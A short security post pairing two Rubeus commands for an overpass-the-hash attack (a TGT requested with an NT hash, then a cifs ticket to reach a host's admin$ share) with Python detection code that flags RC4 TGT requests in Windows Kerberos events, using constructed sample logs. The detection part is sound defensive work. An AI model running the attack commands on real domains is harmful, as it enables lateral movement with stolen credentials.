If we have an NT hash we can pass it using Rubeus in memory, request a TGT from the DC, then a TGS for a specific service such as cifs, and read the admin$ share of that host.
invoke-rubeus -Command "asktgt /user:rabiullah.syed /ntlm:NTHASH /domain:FQDN /dc:FQDN /ptt"
invoke-rubeus -Command "asktgs /ticket:ADD-TGT-TICKET /service:cifs/FQDN /ptt"
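From the defender's side, as an added example that is not part of the original post: because only the NT hash is available, the TGT above is negotiated with RC4-HMAC, which shows up as Ticket Encryption Type 0x17 in Security event 4768, and in a domain whose accounts otherwise use AES that is the usual way to spot it. The code pairs each RC4 TGT with the 4769 service tickets (for example cifs) the same account then requested from the same host; field names follow the Windows Security log, while the sample events, account names and addresses are constructed.

```python
"""Flag Kerberos TGTs negotiated with RC4 (etype 0x17), the sign of a TGT requested
with only an NT hash in a domain whose accounts otherwise use AES. Each hit is
paired with the 4769 service tickets the same account then pulled from the same host."""
from datetime import datetime, timedelta

RC4_HMAC = 0x17

def _account(name):
    """Normalise 'User@REALM' or 'user' to a lower-case account name."""
    return name.split("@", 1)[0].lower()

def detect_rc4_tgt_requests(events, rc4_allowlist=frozenset(), window=timedelta(minutes=10)):
    """Return one alert per 4768 that used RC4 for an account not on the allowlist.

    `events` are dicts with the fields a 4768/4769 export carries: EventID, TimeCreated
    (datetime), TargetUserName, ServiceName, TicketEncryptionType (int), IpAddress.
    """
    service_tickets = [e for e in events if e["EventID"] == 4769]
    alerts = []
    for tgt in (e for e in events if e["EventID"] == 4768):
        user = _account(tgt["TargetUserName"])
        if tgt["TicketEncryptionType"] != RC4_HMAC or user in rc4_allowlist:
            continue
        # Service tickets requested by the same account from the same source host
        # within `window` after the suspicious TGT show what it was used for.
        services = sorted(
            t["ServiceName"] for t in service_tickets
            if _account(t["TargetUserName"]) == user
            and t["IpAddress"] == tgt["IpAddress"]
            and tgt["TimeCreated"] <= t["TimeCreated"] <= tgt["TimeCreated"] + window
        )
        alerts.append({"user": user, "source_ip": tgt["IpAddress"], "services": services})
    return alerts

def _ev(event_id, minute, user, service, etype, ip):
    return {"EventID": event_id, "TimeCreated": datetime(2024, 1, 15, 9, minute),
            "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip}

# Constructed sample events (not real log data) in the shape of a 4768/4769 export.
SAMPLE_EVENTS = [
    _ev(4768, 0, "alice", "krbtgt", 0x12, "10.0.0.5"),             # normal AES256 logon
    _ev(4768, 1, "jdoe", "krbtgt", RC4_HMAC, "10.0.0.23"),         # RC4 TGT: suspicious
    _ev(4769, 3, "jdoe@CORP.EXAMPLE", "cifs/fs01.corp.example", RC4_HMAC, "10.0.0.23"),
    _ev(4769, 40, "jdoe@CORP.EXAMPLE", "ldap/dc01.corp.example", 0x12, "10.0.0.23"),  # outside window
    _ev(4768, 5, "svc_legacy", "krbtgt", RC4_HMAC, "10.0.0.9"),    # allowlisted legacy account
]
```

Accounts that legitimately still use RC4 (old service accounts, some appliances) go on the allowlist so the rule stays quiet for them; everything else that asks for an RC4 TGT is worth a look.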